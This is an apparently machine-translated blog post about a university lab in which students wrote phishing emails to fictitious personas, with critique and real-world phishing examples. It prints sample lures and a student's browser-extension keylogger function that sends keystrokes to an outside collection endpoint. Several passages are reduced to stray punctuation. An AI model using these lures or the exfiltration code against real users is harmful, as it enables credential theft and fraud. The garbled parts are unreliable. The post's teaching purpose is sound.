Hallo Habr! Ich bin der Herausgeber dieses Blogs und unterrichte manchmal auch Virologie an der Universität.
Ich beschloss, den Bildungsprozess zu diversifizieren, und stellte verschiedene Aufgaben für Fünfjahresstudenten vor - so dass Übung und Relevanz und kein Abschreiben von Code aus dem Jahr 2003. Eine der Aufgaben besteht darin, Phishing-Briefe zu erfinden und an fiktive Personen zu senden, die in der Realität existieren könnten. Wenn Sie nicht wissen, wie man angreift, wissen Sie schließlich nicht, wie Sie sich verteidigen sollen, oder?
Ich werde das Beste zeigen, was passiert ist: welche Briefe die Betrüger im Namen von Yandex senden konnten. Geld, wie die Schüler vorgaben, Dienstleistungen zu sein, und zum Nachtisch - die Methoden, die die Betrüger derzeit anwenden (zum Beispiel mehrere Briefe, die unsere aufmerksamen Benutzer erhalten haben).
Warnung
Beschäftige dich nicht mit Phishing. Formal handelt es sich um Betrug, der gemäß Artikel 159.6 des Strafgesetzbuchs der Russischen Föderation verfolgt wird. Die Laborarbeiten wurden unter kontrollierten Bedingungen durchgeführt, Briefe wurden an vorbereitete Kartons geschickt, auf die nur der Verfasser der Post zugreifen kann. Die Schüler werden vor einer möglichen Haftung für Phishing-Mails aus dem Labor gewarnt.
Alle Charaktere sind fiktiv, alle Zufälle mit realen Menschen und Organisationen sind zufällig. Alle Logos, Marken und Namen gehören ihren jeweiligen Eigentümern.
Ich habe bereits vor etwas mehr als einem Jahr eine ähnliche Geschichte erzählt. Seitdem wurde ich Herausgeber des Habrablog. Bei der Arbeit kommuniziere ich viel mit verschiedenen Abteilungen, einschließlich der Abteilung für Informationssicherheit. Das gesamte Unternehmen, was in Bezug auf Geld logisch ist, geht entsprechend an die Sicherheit heran - der Sicherheitsdienst (SB) schützt alles und jeden im Inneren und verhindert auch, dass die Betrüger versuchen, im Namen des Dienstes Verbrechen zu begehen.
Und da ich mich entschied, den Schülern eine solche Aufgabe zu geben, fragte ich mich, ob sie den fiktiven Figuren das fiktive Geld vergleichsweise ehrlich wegnehmen könnten. Motivation ist hier wichtig - all dies geschieht nur zu Bildungszwecken, damit zukünftige Sicherheitsspezialisten verstehen, welche Bedrohungen bestehen und wie sie sich vor ihnen schützen können.
Dramaturgie
Alle Menschen sind unterschiedlich - mit unterschiedlichen Erfahrungen, IT-Kenntnissen und unterschiedlichen Überzeugungen in Bezug auf Menschen. Deshalb habe ich drei Charaktere entwickelt und die Schüler gebeten, einen Ansatz für sie zu finden. Die Einschränkungen waren rein technischer Natur - ein Brief sollte an die angegebene Mailbox gesendet werden, es sollte kein Spam sein und es sollte eine Möglichkeit geben, persönliche Daten zu sammeln. Welche liegen im Ermessen des Schülers.
Die volle Laboraufgabe liegt unter dem Spoiler.
Laborjob . 1. . napechata.li/form , . 2. , . 3. , . , , , . 4. — (, , , ) , . . 5. , , . . (, , ) . 6. , , . 7. , , . : 1. 2. , 3. 4. 5. ,
Valeria Valeryevna Golova, 31 Jahre, Ust-Kamenogorsk
Rechtsanwalt in der privaten Anwaltskanzlei Soft Sign. Mail - odnagolowa@yandex.ru.
Valeria ist von Natur aus ein Humanist, aber im Herzen ein Technikfreak. Sie absolvierte das Ust-Kamenogorsk College für Informationstechnologie und arbeitet als Anwältin für Systemadministratoren in einer privaten Firma mit vier Mitarbeitern.
Valeria speichert gerne Lampenbilder in sozialen Netzwerken, hat einen Blog im LiveJournal, in dem sie ihre Träume teilt, und sonntags geht sie zu kostenlosen Konzerten, die sie in der Gruppe „Kostenlose Konzerte von Ust-Kamenogorsk“ findet.
Khusanboy Erdashevich Sotvondiev, 19 Jahre, St. Petersburg
Taxifahrer in der Taxiflotte "Timoshinsky". Mail - husanboy7902301@mail.ru
Husanboy kam aus Urgench nach St. Petersburg, wo er drei Jahre als Taxifahrer arbeitete. Jetzt macht er dasselbe in St. Petersburg auf dem alten Kia Rio, den er von einem Freund geerbt hat. Früher hat Husanboy Rap-Tracks aufgenommen und ohne Pseudonym veröffentlicht, aber jetzt folgt er nur noch neuen Künstlern, sodass er auf allen beliebten thematischen Websites registriert ist.
Albert Mikhailovich Alberlive, 54 Jahre, Chabarowsk
Selbständig. Mail - al.ber.live@outlook.com
Albert Mikhailovich hat viel in seinem Leben gesehen - er schickte Briefe an Mavrodi, beschuldigte Kashpirovsky mit Wasser und war ein Tiens-Platin-Agent mit einem Netzwerk von 22 Personen. Jetzt wartet er wieder auf den Ruhestand und um keine vergebliche Zeit zu verschwenden, beschloss er, in Bitcoins und Cashbury zu investieren. Albert Mikhailovich hat Profile in allen sozialen Netzwerken, elektronische Geldbörsen in allen russischsprachigen Diensten und ein unglaubliches Vertrauen in Menschen und Technologie.
Gesendet
In diesem Jahr hatten die Schüler weniger Zeit - daher kamen die ersten Briefe ziemlich schnell an. Trotzdem spiegeln die meisten von ihnen echte Phishing-Muster wider, die die Schüler im Internet gefunden und versucht haben, auf den Zustand des Problems anzuwenden.
Albert Alberlive
Ehrlich gesagt hat mich dieser Charakter am meisten fasziniert - was wird passieren, welche Briefe und von welchen Diensten werden fliegen? Finanzpyramiden, elektronische Geldbörsen, Kryptowährungen? Die Schüler haben nicht enttäuscht - im Posteingang befanden sich Briefe zu all diesen Themen der gängigsten Zahlungssysteme. Ich möchte alles auf den Punkt bringen, aber das ist leider unmöglich.
Phishing im Auftrag von Yandex.Money
Zunächst interessierte ich mich für Briefe im Namen von Yandex.Money.
Alle Studenten, die im Namen des Dienstes Briefe verschickten, verfolgten einen ähnlichen Ansatz: Sie kündigten ein neues Produkt an, das Sie vor allen Problemen bewahrt und Ihnen hilft, Geld zu verdienen. Wie ich später zeigen werde, entspricht dies nicht ganz dem tatsächlichen Verhalten von Betrügern.
Ich möchte Sie daran erinnern, dass alle offiziellen Yandex.Money-Anwendungen in einem speziellen Bereich auf der Yandex-Website gespeichert sind und die Ankündigungen neuer Artikel im Pressedienst verfügbar sind. Überprüfen Sie dort, ob Sie plötzlich eine ungewöhnliche oder schockierende Ankündigung über Yandex.Money in einer unverständlichen Quelle sehen.
Nun wollen wir sehen, was mit diesen Buchstaben nicht stimmt. Speziell dafür habe ich Natasha, die leitende Redakteurin von Money, im Korridor erwischt und Screenshots gezeigt. Natasha weiß alles darüber, wie sie schreiben und nicht in Geld schreiben, was ich ausgenutzt habe.
Die Frage war einfach: Wie kann man verstehen, dass dies nicht von uns geschrieben wurde? Ich sende das Mikrofon:
Yandex.Crypto Brieftasche
Top-Level: Es ist nicht klar, warum der Benutzer überhaupt eine E-Mail zu diesem Thema erhält. Ein Brief darüber, was Kryptowährungen im Allgemeinen gut können, aber wie sie für mich nützlich sein können, ist unklar.
Laut Text: Ausrufezeichen (wir haben fast keine), Büroangestellte (Gewährleistung der Transaktionssicherheit -) + Nachlässigkeit bei der Typografie.
Yandex-Rettung
- Name + Post im Umlauf.
- Unsicherheit: Was bedeutet "kompromittiert"? Was habe ich damit zu tun?
- Wieder die Kanzlei.
- Was ist eine "bestätigte Genesung", würde ich gerne wissen.
- Es gibt keine Verbindungsüberschrift + Schaltfläche (wir versuchen normalerweise, diese Kombination zu einer allgemeinen Vorstellung von der Essenz zu machen).
Technischer Support Yandex.Money
Hier ist alles schlecht: von Kleinigkeiten wie nachlässigem Design bis zur Hauptnachricht (warum sonst das Konto nicht wiederhergestellt werden kann - es ist Erpressung Erpressung).
Im Allgemeinen, fasste Natasha zusammen, schreiben wir nicht so. Kommen wir zu anderen bemerkenswerten Beispielen.
Heiße Briefe für AlbertNeuer innovativer Bergmann
Fortschritt ohne Sorgen.
Sie wollten schon immer die Welt der Kryptowährungen berühren, wussten aber nicht, wo Sie anfangen sollen? Verwenden Sie unseren Bergmann, wenn Sie keinen Computer verwenden. Auch die Zeit wird für Sie arbeiten.
Vorwärts.
Alles, um in einer Laune zu beginnen http://clc.am/ \
In diesem Brief ist alles in Ordnung - nur die normale Schaltfläche mit einem Aufruf zum Handeln fehlt. Stattdessen gibt es unten einen kleinen Link, der immer noch nicht klickt. Im Allgemeinen ein vollständiger Ausfall der potenziellen Kryptogenese auf dem Kryptowährungsmarkt.
Versprochene Brötchen - keine Anstrengungen unternehmen, alles funktioniert von selbst, ohne Investitionen. Na ja, natürlich.
Investment-Handelsplattform der neuen Generation
Werden hier Kommentare benötigt?
Fotobank von Fotobank
Wie füge ich einen Soliditätsbrief hinzu? Verwenden Sie natürlich Fotos aus Fotobanken. Es ist überraschend, dass unten im selben Brief keine lächelnden Menschen in Geschäftsanzügen sind.
Valeria Golova
Valeria schickte viele Briefe von LiveJournal, VK, von klaren Traumkursen, Websites mit Ereignissen und sogar einige Nachrichten von Fans ihres Blogs.
Heiße Briefe für Valeria
Lernen steht nicht still und entwickelt sich. Valeria wurde angeboten, Werbekategorien auszuwählen - warum nicht ein so tolles Angebot nutzen?
"Angreifer" versucht - der Link im Brief führt auf einem kostenlosen Hosting zur Website, wo sie im LiveJournal-Stil ein Formular zur Eingabe persönlicher Daten und Karteninformationen gezeichnet haben.
Es ist sehr einfach, nichts zu ahnen - sondern nur die Adressleiste zu überprüfen. Als ich diesen Link zum ersten Mal öffnete und eine fiktive Karte betrat, sah ich außerdem dieses Popup:
Sie warnen Sie nicht umsonst - die Seite ist wirklich gefährlich.
Solche "Websites" auf kostenlosem Hosting halten nicht lange und sind auch mit Wasserzeichen gefüllt. Bei einem kostenpflichtigen Hosting (und einer Domain der zweiten Ebene) können Sie eine Beschwerde über Phishing und Betrug senden. Wie die Praxis zeigt, werden solche Websites aktiv blockiert. Beispielsweise sendet unser Sicherheitsrat regelmäßig Anträge an Registrare, wenn er ein neues betrügerisches System entdeckt.
LiveJournal-Desktopanwendung
Die Jungs waren nicht zu faul und haben sogar eine Desktop-Anwendung geschrieben - gut gemacht. Auch das Betrachten von Publikationen ohne Internet hat geschraubt.
Der Link führt zur exe-Datei: http: //xxx.193.52.92/livejournal_desktop_1.0.3b.exe . Natürlich werde ich es nicht hochladen.
Bevor Sie Anwendungen aus zweifelhaften Quellen installieren (und Mail ist eine sehr zweifelhafte Quelle), besuchen Sie die offizielle Website und prüfen Sie, ob sie überhaupt vorhanden ist. Und wenn ja, installieren Sie von dort.
Browser-Erweiterung
Ich liebe meine Schüler und schränke ihre Fantasie praktisch nicht ein. Dies führt dazu, dass solche Briefe kommen. Ich bringe es in seiner Gesamtheit - es ist so schön.
> , . "Your Favourite Song". , -! , , ! . , , , , - -. - , . . > 1. https://goo-gl.ru/OK zip-. 2. zip- . 3. . 4. " ". 5. , keylogExten. 6. . 7. ! > , "Your Favourite Song".
Hier ist der Ansatz der radikalste, der in diesem Jahr gesendet wurde. Als Referenz - Shortener, der zum Cloud-Speicher umleitet. Dort liegt ein Browser-Keylogger, der in zwei Archiven verpackt ist. Darin befindet sich ein einfacher Ereignis-Listener, der auf jquery ausgeführt wird, auf Keydown-Ereignisse wartet, Codes in Paketen sammelt und an einen Server sendet.
function sendSymOnServer(page, data) { var xhr = new XMLHttpRequest(); var body = 'page = ' + encodeURIComponent(page) + '&data = ' + encodeURIComponent(data); xhr.open("POST", 'https://requestb.in/1fa7izj1', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(body); }
Installieren Sie natürlich niemals unnötige Erweiterungen - insbesondere solche, deren Beschreibung ein Wort-Keylog enthält.
Schreiben, schneiden
Wie im letzten Jahr war brillantes Texten nicht ohne. Während ich diesen Artikel schrieb, stellte sich heraus, dass jemand anderes Texter war, und der Student nahm den Text aus dem Internet.
An dieser Stelle zeigen mir alle kontextbezogenen Werbebanner alles über klare Träume. Und es scheint dir auch. Danke nicht.
Briefe von Fans
Was mich betrifft, die gefährlichste Art von Phishing. Ein Angreifer hat die Situation erkundet und trifft auf wunde Stellen - es kann für jeden schwierig sein, mit Lob, Schmeichelei und Anerkennung umzugehen und nicht auf einen Betrüger zu reagieren.
Hier ist ein Beispiel:
Guten Abend, Valeria.
Ich entschuldige mich für die Besorgnis, mein Name ist Dmitry, und zunächst möchte ich mich bei Ihnen für Ihre herzlichen Beiträge in der Zeitschrift bedanken.
Wahrscheinlich würde ich ein stiller Leser bleiben, inspiriert von Ihrem Beispiel, aber der Traum von gestern lässt mich immer noch nicht los.
Er erinnerte mich an die Arbeit eines talentierten visionären Künstlers namens Freudun Rassuli und in größerem Maße an sein Gemälde "Journey Home".
Wie bei Ihnen ist das Thema der kosmischen Einheit diesem Künstler nahe: Er war sich sicher, dass jede Schöpfung ein Produkt der Synchronisation unserer Energien mit dem Universum ist.
Ich dachte, es wäre interessant für Sie, seine Arbeit genauer kennenzulernen, deshalb habe ich die raffinierteste und tiefste seiner Arbeiten ausgewählt.
Leider kann ich nicht alle auf einmal anhängen, aber ich kann Ihnen ein Archiv mit meiner eigenen Auswahl anbieten.
https://cloud.mail.ru/public/Bg6E/WKr64w
Ich bin sicher, dass Sie unter diesen erstaunlichen Gemälden viele Ähnlichkeiten mit Ihren Träumen finden können. Und ich denke, sie werden auf Ihrem Blog großartig aussehen.
Mit freundlichen Grüßen,
Ihr regelmäßiger Leser.
Der Link enthält die Datei Figures.exe, in der es natürlich keine Zeichnungen gibt, aber einen Keylogger.
Und noch ein Fan:
> , . > , . > . . , - ? . . . ""? . > , > .
Unter dem Link befindet sich eine weitere Form der Autorisierung in LiveJournal für ein kostenloses Hosting (auf den Punkt gebracht - Livejjournal). Es gibt https, also schwören Browser nicht, aber Sie müssen trotzdem genau hinschauen.
Antiphishing
Übrigens hat Yandex nach den ersten Briefen einen Brief geschickt, wie man gute Briefe von Briefen von Betrügern unterscheidet. Mahnwache.
Husanboy Sotvondiev
Die Schüler verstanden den komischen Geist der Aufgabe gut und schickten Dinge, die mir eine Reihe von Emotionen verursachten, von nervösem Lachen bis zu Verwirrung. Im Allgemeinen scheint es mir, dass sie gute Arbeit geleistet haben. Die Charaktere erhielten Briefe von Rap-Sites, Geldstrafen von Portalen des öffentlichen Dienstes, Briefe von Taxiunternehmen (darunter gab es nur einen mit dem Namen "Timoshinsky") und nach der Tradition mehrere persönliche Briefe.
Heiße Briefe für HusanboyUnbekannter Rap-Künstler-Wettbewerb
Zunächst wende ich mich an unbekannte Rap-Künstler, die auf diese Seite gekommen sind, um am Wettbewerb teilzunehmen.
Ihr Jungs, reagiert niemals auf solche Briefe, das macht keinen Sinn.
> ! > . - . , . 6 . . . , / , / , , .
Wenn Sie diesen Text lesen konnten, ohne jemals die Augen zu springen, sagen Sie uns, was da ist. Der Link nach dem Brief führt zu einer Google-Form von 30 Feldern (Trojanischer Elefant!), Von denen die bemerkenswertesten sind:
- Login: Passwort.
- Programme, die beim Erstellen (Aufnehmen) des Tracks * verwendet wurden.
- E-Mail / Links in den sozialen Netzwerken von Mitarbeitern, die sich für Hip-Hop * interessieren könnten.
- Vollständiger Name Mitarbeiter, die sich für Hip-Hop * interessieren könnten.
Geben Sie niemals auf den unbekannten Websites die vollständigen Namen der Mitarbeiter ein, die an der Richtung des Hip-Hop interessiert sein könnten.
Sotvondiev Antivirus
Guten Tag!
Im Zusammenhang mit der Verschärfung der Richtlinien für die Verarbeitung personenbezogener Daten in unserer Taxiflotte müssen alle Mitarbeiter ein zertifiziertes Sicherheitstool verwenden.
Als solches Tool wurde Kaspersky Endpioint Security in unserem Unternehmen ausgewählt, das über Konformitätszertifikate des FSB SF / 019-3471 und des FSTEC Nr. 3025 verfügt.
Sie können die Installationsdateien dieses Tools unter folgendem Link herunterladen:
http://aes.s.kaspersky-labs.com/endpoints/keswin11/11.0.1.90/russian-2778/bb0e36ac/keswin_11.0.1.90_en_aes256.exe
Die Aufforderung der Mitarbeiter, Kaspersky Endpoint Security selbst herunterzuladen und zu installieren. Am Ende des Monats, während der geplanten Inspektion, werden die Mittel von den Spezialisten unserer Abteilung aktiviert.
Abteilung für technische Sicherheit der Taxiflotte "Timoshinsky".
Es ist gut, dass es Betrügern peinlich ist, Rechtschreibprüfungen durchzuführen. Dies hilft, Häresien im Posteingang zu identifizieren und zu löschen, ohne sie zu lesen. Natürlich führt der Link an die falsche Stelle - obwohl auch zur ausführbaren Datei.
Unbekannte Rap-Künstler und wo sie leben
Klicken Sie stattdessen auf den Link, schauen Sie und dort ...
Dieses Studententeam entschied sich, herauszufinden, wie man eine Person beim Phishing fängt. Dies ist nicht ohne Bedeutung - ein Verständnis der Mechanik des Prozesses ist hier wichtig, deshalb habe ich das Labor damit gezählt, wenn auch nicht ohne zu zögern.
Ich wiederhole noch einmal - geben Sie keine Daten auf Bankkarten auf nicht überprüften Websites ein.
Aufnahme in einem Rapper-Clip
Ich gehe, entschlossen, in dem Video zu spielen, und dort:
> Fehler: Dieses Konto wurde gesperrt.
Details zum Kontoinhaber:
Name: Phishing erkannt
Benutzername:
E-Mail: rap.ruXXXX@gmail.com
Wie Sie sehen können, bekämpfen Dienste Phishing, noch bevor ich auf Habré darüber gesprochen habe. Daher habe ich nur aus dem Bericht erfahren, was sich auf der Website befindet. Ein anderes Mal werde ich darüber sprechen, wie ich Berichte erhalte - dies ist eine separate große Geschichte.
Hysterische Probefahrt
Das Kia Center St. Petersburg berichtet, dass Sie die einmalige Chance haben, ein brandneues Kia Quoris-Auto zu mieten. Dies ist ein völlig neues Business-Class-Modell mit einem völlig neuen Motor und einem neu gestalteten Federungs- und Getriebesystem. Und vor allem erhalten Sie eine beispiellose Gelegenheit, dieses Auto für einen Monat zu bekommen !!! Für den persönlichen Gebrauch !!! Fahren Sie in der Stadt, probieren Sie lange Reisen, bewerten Sie die Qualität und Zuverlässigkeit unseres neuen Autos!
Sogar in dem Brief gab es ein schönes Bild mit diesem Auto und einen Link zu einem Online-Formular, um verschiedene Informationen zu erhalten.
Der Student verwendete auch Informationen darüber, dass der Charakter das Auto eines Freundes fuhr, und weckte das Interesse des potenziellen Opfers mit der Tatsache, dass nur noch 3 Autos übrig waren. Im Allgemeinen ist es Zeit zu rennen, sich zu beeilen und sich für eine kostenlose Probefahrt anzumelden.
Und es ist besser, sich daran zu erinnern, dass es im Internet nichts umsonst gibt und Sie sich nicht von zweifelhaften Briefen täuschen lassen.
Wie Phishing in freier Wildbahn aussieht
Alle obigen Beispiele sind die Fantasie meiner Schüler und beziehen sich nur insofern auf die Realität, als sie alle geschrieben und gesendet werden können. Es ist ganz einfach, sich zu schützen - überprüfen Sie einfach die Links sorgfältig, laden Sie keine fremden Dateien aus Anhängen herunter und achten Sie auf Tippfehler in den Texten. Und wenn Sie auf unbekannten Websites keine persönlichen Daten eingeben, können Sie Ihr ganzes Leben lang leben und nicht herausfinden, wie es ist, wenn Sie Geld stehlen oder einen Mikrokredit aufnehmen, um Ihren Reisepass zu scannen.
Ich habe Kollegen vom Sicherheitsrat gebeten, echte Phishing-E-Mails zu zeigen, die gerade in freier Wildbahn leben. Dies sind nur einige Beispiele, die zeigen, dass Betrüger sehr unterschiedliche Tricks anwenden können, um an Ihr Geld zu kommen. In der Tat gibt es viele mehr, so dass Sie auf alles vorbereitet sein müssen.
Ihre Brieftasche wird aufgefüllt
Der Benutzer erhält eine Nachricht, dass seine Brieftasche aufgefüllt ist. Im Kommentar zur Zahlung gibt es einen Werbe-Eyeliner und einen Link zu einer Website, auf der Sie angeblich tausend Dollar pro Tag erhalten können, ohne etwas dafür zu tun.
Es stellt sich heraus, dass Betrüger solche Briefe nicht nur fälschen können. Tatsache ist, dass ein gefälschter Brief mit hoher Wahrscheinlichkeit den Spamfilter in der Mail nicht durchläuft. Der automatische Brief des Dienstes, der nach einer echten Mikrozahlung auf das Konto erstellt wurde, kann jedoch erreicht werden.
Der Link aus dem Kommentar führt normalerweise zu einer Seite, auf der versucht wird, der Bevölkerung relativ ehrlich Geld abzunehmen.
Ihre IP-Adresse wurde aufgelistet
Ein Brief angeblich von Yandex.Money Tech Support. Sie wissen es bereits von der Gegenwart zu unterscheiden - dank Natasha.
Was passiert sonst noch?
Beim Phishing geht es natürlich nicht nur um Buchstaben.
Ein Beispiel für etwas anderes als den Blog-Leser hat uns geschickt. Stellen Sie sich vor - dies ist eine betrügerische Instagram-Werbung, die zu einer betrügerischen Öffentlichkeit auf VK führt, die zu einem betrügerischen Landeplatz mit betrügerischen Umfragen führt, für die sie angeblich betrügerisches Geld bezahlen.
Natürlich zahlen sie nicht wirklich.
Dies ist eine gefälschte Anzeige.
Diese Kette hat sogar die Bedingung "Sende einen Link an 20 Freunde auf WhatsApp, um fortzufahren." Aber wenn viel Geld auftaucht, ist es sehr schwierig, sich zurückzuhalten.
- , « ?» ( , ) :
« 80000 , — . 150 ».
, , .
?
:
- , .
- , — , , .
- — , , — . , .
- , - , .
- .
- . , .
- , . , - .
- . .
, , , . , . .